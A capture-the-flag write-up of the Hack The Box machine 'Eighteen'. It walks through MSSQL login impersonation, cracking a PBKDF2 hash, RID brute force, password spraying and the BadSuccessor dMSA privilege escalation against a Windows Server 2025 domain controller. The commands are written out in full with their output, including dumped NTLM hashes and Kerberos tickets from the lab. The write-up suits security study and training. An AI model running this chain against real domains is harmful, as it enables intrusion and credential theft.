Reconnaissance
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2025-11-16T17:04:08+00:00; +7h00m00s from scanner time.
| ms-sql-info:
| 10.129.68.228:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.68.228:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-16T15:42:09
|_Not valid after: 2055-11-16T15:42:09
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
According to the identified hostname DC01 I’m likely dealing with the Domain Controller for the eighteen.htb domain and I’m adding them to my /etc/hosts file. Even though it might be a DC the usual ports are not exposed and there’s only HTTP, MSSQL and WinRM.
Initial Access
As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account:
kevin:iNa2we6haRj2gaw!
The page on eighteen.htb is about tracking expenses and income, but the provided credentials do not work. Albeit I could register a new account, I first try the other protocols.
WinRM also reports an authentication failure with kevin, so I attempt MSSQL next. This time the credentials do work and I get a session with mssqlclient. Enumerating the available databases list financial_planner as the only non-default one and this likely holds the data for the application on port 80. Accessing the DB as kevin is not possible.
$ impacket-mssqlclient kevin:'iNa2we6haRj2gaw!'@dc01.eighteen.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
SQL (kevin guest@master)> enum_db
name is_trustworthy_on
----------------- -----------------
master 0
tempdb 0
model 0
msdb 1
financial_planner 0
SQL (kevin guest@master)> use financial_planner
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.Checking if kevin can impersonate any other user returns a single result regarding appdev. As soon as I change the context, I’m able to access the financial_planner database and can list its tables.
SQL (kevin guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
b'LOGIN' b'' IMPERSONATE GRANT kevin appdev
SQL (kevin guest@master)> exec_as_login appdev
SQL (appdev appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)> SELECT name FROM sys.tables WHERE type = 'u';
name
-----------
users
incomes
expenses
allocations
analytics
visitsObviously the users table is the most interesting one considering it might hold credentials. There’s only one user called admin with its password hash.
SQL (appdev appdev@financial_planner)> SELECT * FROM users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03In order to crack this hash with hashcat it has to be converted in a format that conforms to mode 10900. It expects the format sha256:<iterations>:<salt>:<hash> with salt and hash in base64-encoding1. The hash part can be easily decoded from hex and re-encoded in base64 with bash. The tricky part here is also encoding the salt even though it just consists out of characters in the base64 alphabet, because it’s actually in ascii.
$ echo -n '0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133' | xxd -r -p | base64 -w0
BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=
$ echo -n 'AMtzteQIG7yAbZIa' | base64 -w0
QU10enRlUUlHN3lBYlpJYQ==
$ hashcat -m 10900 \
'sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=' \
/usr/share/wordlists/rockyou.txt
--- SNIP ---
sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1hashcat takes a bit longer than usual but eventually prints iloveyou1 as the cracked password. It lets me login to the web interface but even as admin there’s nothing else of interest.
I then use nxc to brute force valid users/groups through MSSQL with --rid-brute and add all the identified users in a text file called users.txt.
$ nxc mssql dc01.eighteen.htb -u kevin \
-p 'iNa2we6haRj2gaw!' \
--local-auth \
--rid-brute
MSSQL 10.129.68.228 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.68.228 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.129.68.228 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.129.68.228 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.129.68.228 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.129.68.228 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.129.68.228 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.129.68.228 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.129.68.228 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.129.68.228 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.129.68.228 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.129.68.228 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.129.68.228 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.129.68.228 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.129.68.228 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.129.68.228 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.129.68.228 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.129.68.228 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.129.68.228 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.129.68.228 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.129.68.228 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.129.68.228 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.129.68.228 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.129.68.228 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.129.68.228 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.129.68.228 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.129.68.228 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.129.68.228 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.129.68.228 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.129.68.228 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.129.68.228 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.129.68.228 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.129.68.228 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.129.68.228 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.129.68.228 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.129.68.228 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.129.68.228 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.129.68.228 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.129.68.228 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.129.68.228 1433 DC01 1612: EIGHTEEN\dave.green
$ cat users.txt
Administrator
jamie.dunn
jane.smith
alice.jones
adam.scott
bob.brown
carol.white
dave.greenBy using password spraying I can quickly find a valid combination and proceed to login via WinRM and the credentials adam_scott:iloveyou1 to collect the first flag.
$ nxc winrm dc01.eighteen.htb -u users.txt \
-p 'iloveyou1' \
--continue-on-success
WINRM 10.129.68.228 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
WINRM 10.129.68.228 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\bob.brown:iloveyou1
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\carol.white:iloveyou1
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\dave.green:iloveyou1
Privilege Escalation
The Domain Controller is running a fairly new version of Windows Server. In version 2025 a new feature called Delegated Managed Service Accounts (DMSA) was introduced2 and this can be used for an attack dubbed BadSuccessor3.
PS > Get-ComputerInfo
WindowsBuildLabEx : 26100.1.amd64fre.ge_release.240331-1435
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerDatacenter
WindowsInstallationType : Server Core
WindowsInstallDateFromRegistry : 3/24/2025 3:38:13 AM
WindowsProductId : 00491-60000-17651-AA131
WindowsProductName : Windows Server 2025 Datacenter
WindowsRegisteredOrganization :
WindowsRegisteredOwner :
WindowsSystemRoot : C:\WINDOWS
WindowsVersion : 2009
OSDisplayVersion : 24H2
--- SNIP ---There are several proof-of-concepts available, like SharpSuccessor or BadSuccessor. I decide to use the latter since it does have a compiled version available in the repository. After uploading the binary to the target I can execute it with the find sub-command to search for vulnerable OUs where the current user is able to create children. This finds OU=Staff and I can use escalate to create a new DMSA that’s linked to the Administrator account.
PS > .\BadSuccessor.exe find
______ __ _______
| __ \ .---.-.--| | __|.--.--.----.----.-----.-----.-----.-----.----.
| __ < | _ | _ |__ || | | __| __| -__|__ --|__ --| _ | _|
|______/ |___._|_____|_______||_____|____|_____|_____|_____|_____|_____|__|
Researcher: @YuG0rd
Author: @kreepsec
[*] OUs you have write access to:
-> OU=Domain Controllers,DC=eighteen,DC=htb
Privileges: GenericWrite, GenericAll
-> OU=Staff,DC=eighteen,DC=htb
Privileges: GenericWrite, GenericAll, CreateChild
PS > .\BadSuccessor escalate `
-targetOU "OU=Staff,DC=eighteen,DC=htb" `
-dmsa ryuki_dmsa `
-targetUser "CN=Administrator,CN=Users,DC=eighteen,DC=htb" `
-dnshostname ryuki_dmsa `
-user adam.scott `
-dc-ip 127.0.0.1
______ __ _______
| __ \ .---.-.--| | __|.--.--.----.----.-----.-----.-----.-----.----.
| __ < | _ | _ |__ || | | __| __| -__|__ --|__ --| _ | _|
|______/ |___._|_____|_______||_____|____|_____|_____|_____|_____|_____|__|
Researcher: @YuG0rd
Author: @kreepsec
[*] Creating dMSA object...
[*] Inheriting target user privileges
-> msDS-ManagedAccountPrecededByLink = CN=Administrator,CN=Users,DC=eighteen,DC=htb
-> msDS-DelegatedMSAState = 2
[+] Privileges Obtained.
[*] Setting PrincipalsAllowedToRetrieveManagedPassword
-> msDS-GroupMSAMembership = adam.scott
[+] Setting userAccountControl attribute
[+] Setting msDS-SupportedEncryptionTypes attribute
[+] Created dMSA 'ryuki_dmsa' in 'OU=Staff,DC=eighteen,DC=htb', linked to 'CN=Administrator,CN=Users,DC=eighteen,DC=htb' (DC: 127.0.0.1)
--- SNIP ---With impacket
In v0.13.0 the impacket suite was updated to include the code for interactions with DMSA4, but first I upload chisel to the DC and create a SOCKS proxy for me to interact with the machine. Then I use getST to impersonate ryuki_dmsa$ and dump the service ticket to disk. After exporting the ccache as KRB5CCNAME I’m able to use secretsdump to get all the hashes of the domain or use it via psexec/wmiexec for an interactive session.
$ proxychains -q faketime -f +7h getST.py 'EIGHTEEN.HTB/adam.scott'@dc01.eighteen.htb \
-impersonate 'ryuki_dmsa$' \
-self \
-dmsa
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating ryuki_dmsa$
[*] Requesting S4U2self
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:352e1beecc46f6862a8fd388a8e60cd2dd6ca805e4d464cdcbf6f5cb486d4844
[*] EncryptionTypes.aes128_cts_hmac_sha1_96:e4effb56cd9dc560f24ddafd91dd3b6f
[*] EncryptionTypes.rc4_hmac:02c3aa1ffe07dfe71f91b3222679ef57
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec
[*] Saving ticket in ryuki_dmsa$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
$ export KRB5CCNAME=ryuki_dmsa\$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
$ proxychains -q faketime -f +7h impacket-secretsdump -no-pass -k dc01.eighteen.htb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8a6c03715ce8a8d26720e83ffe01c780
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
EIGHTEEN\DC01$:plain_password_hex:4300770067007000580054005000520033004b005a0038004f00570069006200570074007900350032006f0048003300310054002b0031007a0070006b004b0039006d0037005400620052006b0074004800550051005200550063007200610074005600330072003500720057005a00580068005300360051006800770066004500360031006a0062006a00320063004b004c00320034007100520044003100740046007200320059002b0037004f0058002b0041004100370070004d003d0076006a006d006e004e007a00360042005200690067006400740037004d00350070006e0061006f00350079004300590038006a004c0068004c0069005500700047006d006a00470059006d00410068003800530049004e0046004d0072006b00670053006200790075007a003300620054006700660073004b006a00760048003900720030003300590046003200590035006c005a004d007900380076004b0079003500340037004200770058004c0067006f0054002b006e0065007300510037004a00700074003d003100410038005900750042007600490045007100640061006400760077004d0043006a00330047005700730043004d0038007a004f00730070004f006b004b0079004200690070004500360058006700760050005700480054004d004a00470073007200690056004f0065004e00420038004c006200
EIGHTEEN\DC01$:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x48249fb0f4cf23ecbef54affc2b21d65717bf7df
dpapi_userkey:0xb8820f0412fc851cca8aa426248e7f37af5dd0b2
[*] NL$KM
0000 FA 36 C7 D5 C0 82 AB B5 78 E1 17 F0 5E 36 13 5B .6......x...^6.[
0010 A5 9F C0 9C 38 A8 C4 34 FE 20 F7 2B D9 A2 8C AF ....8..4. .+....
0020 71 F2 E0 D2 09 A1 EC 09 EB DE 9B 8C F5 4A E6 2D q............J.-
0030 6B 1D 32 16 A2 ED B4 AE F1 51 AE 5B 41 E5 4E B6 k.2......Q.[A.N.
NL$KM:fa36c7d5c082abb578e117f05e36135ba59fc09c38a8c434fe20f72bd9a28caf71f2e0d209a1ec09ebde9b8cf54ae62d6b1d3216a2edb4aef151ae5b41e54eb6
[*] _SC_MSSQLSERVER
EIGHTEEN\mssqlsvc:zOq3u4AKw5]e
[*] _SC_SQLSERVERAGENT
EIGHTEEN\mssqlsvc:!JpC319216bama
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::With Rubeus
Exploiting this with Rubeus is almost as straight forward as with getST. I start by requesting a new TGT for adam.scott and pass it via the /ticket parameter into the asktgs call with the /dmsa switch. This requires a recent version of the tool5.
PS > .\Rubeus.exe asktgt /user:adam.scott `
/password:iloveyou1 `
/enctype:aes256 `
/opsec `
/nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Got domain: eighteen.htb
[*] Using domain controller: DC01.eighteen.htb (fe80::6c4:2289:827f:5867%3)
[!] Pre-Authentication required!
[!] AES256 Salt: EIGHTEEN.HTBadam.scott
[!] AES128 Salt: EIGHTEEN.HTBadam.scott
[!] Etype 23 Salt: <not provided>
[*] Using salt: EIGHTEEN.HTBadam.scott
[*] Using aes256_cts_hmac_sha1 hash: 02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\adam.scott'
[*] Using domain controller: fe80::6c4:2289:827f:5867%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFpjCCBaKgAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEYTCCBF2gAwIBEqEDAgECooIETwSCBEvaaI00JhNF2Bu5BCpSDneFB4Irpb5ieGndpckVsow+bcuALHcpJWjkrAfug+asAzfJxGaoElD54QSKa+MIIwSMJQe5IYhxpgwyge/16Lq+xEE3KNJKLAIcZIanUNVkZ5KM1h6eCJMvwZyWPqJqrkK/elmh7eOGHXdqmlSaaElNHcieF2Ii3/s7rZMTxibusaC2ty/PZzekSdgY67S4RO/Rhfj55UsXFMcwGBFlRy2wkZAU8T/mNM2CFRApZj9/xwxXpL57J3mPFRlpIKmwXFMKSbO8eFg5PatmJ/PtfVuBiI7/U2y8fI163iXyxpD6cRZqaBf3LOqePrMwLQWgrA5EScrpTS19IH1EOnrEN4xwd7TvzdGZc+6yNnv6XXvV69Qu+eLDVOGB0FqKE8VujL4DWunN645krVDqLFeMp9LP0rTqQwUkFlmaqlDJpRokMwSuTVApkaON53zlFA3j+nvaFgX1NafPTJG8d7UbICLIQUsEpYtEM+sRxz5NPorfGVYcxSzBzrl68x9+cEg0SJ0y+tCCDpxt87aFaieIIiuYwqlJmB7qFd4GCQ73SdGp/0xDXbQNfJRyrHh5yNVIhN7dYLO75a01kDHqhV16zVtKE8Gpi3EonLfeKPr80WemY9pk1QZKzWKMTywngyyIXp8awt/hcM0qdh5KIrEpbsBnEnUct1fvHn5owRPwYPaAgddE6rD7v/v6JeDLxlpjOb1QRbpJpd5fecwoq1sSzoQtxB7yvpQHNX21t8o0J2U40YiprpyH/ZQ7uP1RiVMj0l3535whBmrZv8XPVk9CsnyUE9EX/wMbpmJWD+AB7dRUsfk9p1HjIMhgrRH//o0VCTM5YQE34qo7myiaN5fU461F9GTsW/0DEovfOJWK1IkInlKw6vfXlUy6q9LXa8ZLnH8X7jc1CYpcdanB6JRw5qPlo3Y8rr7k9FU+k/NwYgBCT688DrVI07v202QB+oIpi4RNnUAMgtApnw/+FTbbioDN+xG5eMTI7uWnP6kJXomDweY/pJGxfUbSGBp6rlJMnL0o6CyGyU/6xgVOhy8WpYv++KjF8Nl235ccd6pdrPK99Wx9eSN28K7Q1Tzk0iMGIB32kl0lZvxOU+ohI1YFkHtPw6uigr5RUJYse7FchvTBUC320+bqwHGICxcJVGpxRdg+LDIkKxpHr1G8xTuBsBPKMg/lcEcvFyPg5oBEmoB2XcOnzn6AisLNlmhCBHHDTiqe3sHJ2jAzuxOzm9VTIOaYD89DXmFlf1aQsT9/ZFibD1YGikMGxnVRl4Omk/DUmPhy1prQRlulT/KrWFq35J1YKJ1Sp+ZqXi5a+R1oF2rVQdn8N+K/wT92MjK1SPImi6vcu1zCt+FeQVdASA867O+50d7xacdIaBIrD6bjkv2vg5/78kpqrSrijXQYidaD7+WAJyJqEG61UFmNbRxcVYNyWONrHhHpaFM//nI8o4HoMIHloAMCAQCigd0Egdp9gdcwgdSggdEwgc4wgcugKzApoAMCARKhIgQgq0hvZ1uxkHWAwri+JklHvn7cfCG/S0UnsBRMerHssqmhDhsMRUlHSFRFRU4uSFRCohcwFaADAgEBoQ4wDBsKYWRhbS5zY290dKMHAwUAQOEAAKURGA8yMDI1MTExNjE5MzMxMFqmERgPMjAyNTExMTcwNTMzMTBapxEYDzIwMjUxMTIzMTkzMzEwWqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDEVJR0hURUVOLkhUQg==
ServiceName : krbtgt/EIGHTEEN.HTB
ServiceRealm : EIGHTEEN.HTB
UserName : adam.scott (NT_PRINCIPAL)
UserRealm : EIGHTEEN.HTB
StartTime : 11/16/2025 11:33:10 AM
EndTime : 11/16/2025 9:33:10 PM
RenewTill : 11/23/2025 11:33:10 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : q0hvZ1uxkHWAwri+JklHvn7cfCG/S0UnsBRMerHssqk=
ASREP (key) : 02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5
PS > .\Rubeus.exe asktgs /targetuser:ryuki_dmsa$ `
/service:krbtgt/eighteen.htb `
/dmsa `
/opsec `
/nowrap `
/ptt `
/ticket:<BASE64 TICKET>
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'ryuki_dmsa$' from 'adam.scott'
[+] Sequence number is: 402612550
[*] Using domain controller: DC01.eighteen.htb (fe80::6c4:2289:827f:5867%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
doIF0DCCBcygAwIBBaEDAgEWooIE0jCCBM5hggTKMIIExqADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEijCCBIagAwIBEqEDAgECooIEeASCBHQBmp1Z+zFue2J1mPeO0PW2Dn3nWdpwKIHJplNu28SlA008w0wCPre6k7Jk/aOTohqwl2n0lYvQLkwrbnLoTJwIKNQ2BmW76mLhljLug4n8/cJHgpr52A3L5D7ukV59UwL6/dqNFpoIjpQ0R72Jemc5J6hwW2ODFn4J8qHZEhTC9IvNe3tZzN15V/KCwVbfoCDivcTTUDgFPN4dvXzi1JhSw+4ARvMXLX7yd3Fj08N9J51UvAUt5Ggl1IirHYkB0pRL0921sAeKmIVJfWkxkDYBdjaxriXKZ/1pAoPPRqN6otVnp5pFGSGlfErPLU5ncFU2Wa2ciFrLyNqtkwoJfUv7xUj1nyhBsIc9TR5Tvkud4Ejns/pU0fcKP1SKST1c25gX8JCyaX96Md2235oNfldM+/B4cz3AFSeRRQTB34q0Lz6rrBH3sLWfFhdbhtnnJzV2DlnpX4tfVSqtMtuPpPDRhHAKV2j462Ev03iv7QQ+6WqVA8G1/c/vXBmTnb8sFdwA02Ht0Eg6wlTXNjBauwpVq/zWPDFER9IJWLy0YvE/JBK0vIDhDSDOEFr5cJqrHfCCVlVElte2zsK3/NOEcQreep6ePFDzOeoANOrJ3Q9esbpnEv2kIP8TjYuJed1sFDM9Ubunem6N/PhBQX6yXjqb/iagVWtmYIKtM/TCSQlT2ge33AR7QrJYlnEpJfKKdA15gzKb41dUsIGM9vfMircRB+ZYabpkICvGWkcR8c2EjvRM2+BK+3Kpz8HsrWJ9orwOu87kwhBo3QjSxU2+ia55g6eNtEenORCw5a8lEYHQLh9Tz2PsReTrfW/lPwLFjIpahE7hiQ38AXDyqt95hLh/3w5hvCIe4EUrLEEZ/StldA4dTOklfxhx8Qj6qYHKu+BDmN+EXFeVdir6EIiybTd0uIJocyHdg+HLzbQt9EPtqO31PuWc0f88z1dBmSUZmCTv8hJKRK+iUvLrdtbM0rC0MEMzEtHQYsMfmKzH/7pNuPu+EFjMeajLxZTZ09yxwr7/EU8+m4LBywsMkZOxgNdkMoLlPtlIiseXzCV1MHgnkHEz4kIkmNeGBq8zNw8Ey4Y8lsuj+/1+tHl2HMqKIsTBeD9EgdHZPkvxehwE6atqVrmXPEBM/W7us/T0GKEQvNZ/A+9sg96AjbCDoFkHLfEEV8u5zyd7m2CW6gJngi8twoMobt46LT0Hmn1lZ8RROC502VnISq16UARMOwFz5+MR/GQzNHv2TDhDWMlJ16G52Ee8Ep+LikOmgq67xrAoQf9T/Xk3Khgu4LULw5H29iHMR3cqKI4a2w+OLZK6GtbP65RQIdydIkwvmEusKv1QjIWg3WaRPUk7Y16OxCJ9ZfFGLrTtvV5VlI8xS6uF6ZCiK4PZVMq3DVr8GjaC4mBaCEfQSt1lS/7kP8JXGwoFRKyc2CC5YCL88w5bbCUAhGzLfaoFhwIsdhgtdDl6kR6S/R+c0geOPJkdnbNro/MYOYK7yzKYzMtlkD2LCSVQdgk+BVWJRw2jgekwgeagAwIBAKKB3gSB232B2DCB1aCB0jCBzzCBzKArMCmgAwIBEqEiBCCmH4KEEs0kktDfaeuGW5+s4AGUwAyNAhoK/03/OIR7IaEOGwxlaWdodGVlbi5odGKiGDAWoAMCAQGhDzANGwtyeXVraV9kbXNhJKMHAwUAQKEAAKURGA8yMDI1MTExNjE5MzMzMlqmERgPMjAyNTExMTYxOTQ4MzJapxEYDzIwMjUxMTIzMTkzMzEwWqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDEVJR0hURUVOLkhUQg==
ServiceName : krbtgt/EIGHTEEN.HTB
ServiceRealm : EIGHTEEN.HTB
UserName : ryuki_dmsa$ (NT_PRINCIPAL)
UserRealm : eighteen.htb
StartTime : 11/16/2025 11:33:32 AM
EndTime : 11/16/2025 11:48:32 AM
RenewTill : 11/23/2025 11:33:10 AM
Flags : name_canonicalize, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : ph+ChBLNJJLQ32nrhlufrOABlMAMjQIaCv9N/ziEeyE=
Current Keys for ryuki_dmsa$: (aes256_cts_hmac_sha1) 0EFF7495E8D992C6C152B3F4ED3F3DC77CDED3F01E33D81019C568F3DA380C1ESince pass-the-ticket only works via the network, I have to convert it from (base64-encoded) kirbi to ccache format to be used with the impacket suite. This allows me to get an interactive session with high privileges.
$ echo -n '<BASE64>' | base64 -d > dmsa.kirbi
$ impacket-ticketConverter dmsa.kirbi dmsa.ccache
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
$ export KRB5CCNAME=dmsa.ccache
$ proxychains -q faketime -f +7h impacket-wmiexec -no-pass -k dc01.eighteen.htb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Users\Administrator\Desktop\root.txt
9ef5b03cc0b3b4e...Attack Path
flowchart TD subgraph "Initial Access" A(Credentials for kevin) -->|MSSQL| B(Guest Access) B -->|Impersonate appdev| C(Access to financial_planner database) C -->|Crack hash for admin| D(Admin Credentials) B -->|RID Bruteforce| E(List of users) D & E -->|Password Spraying| F(Credentials for adam.scott) F -->|WinRM| G(Shell as adam.scott) end subgraph "Privilege Escalation" G -->|BadSuccessor| H(Shell as Administrator) end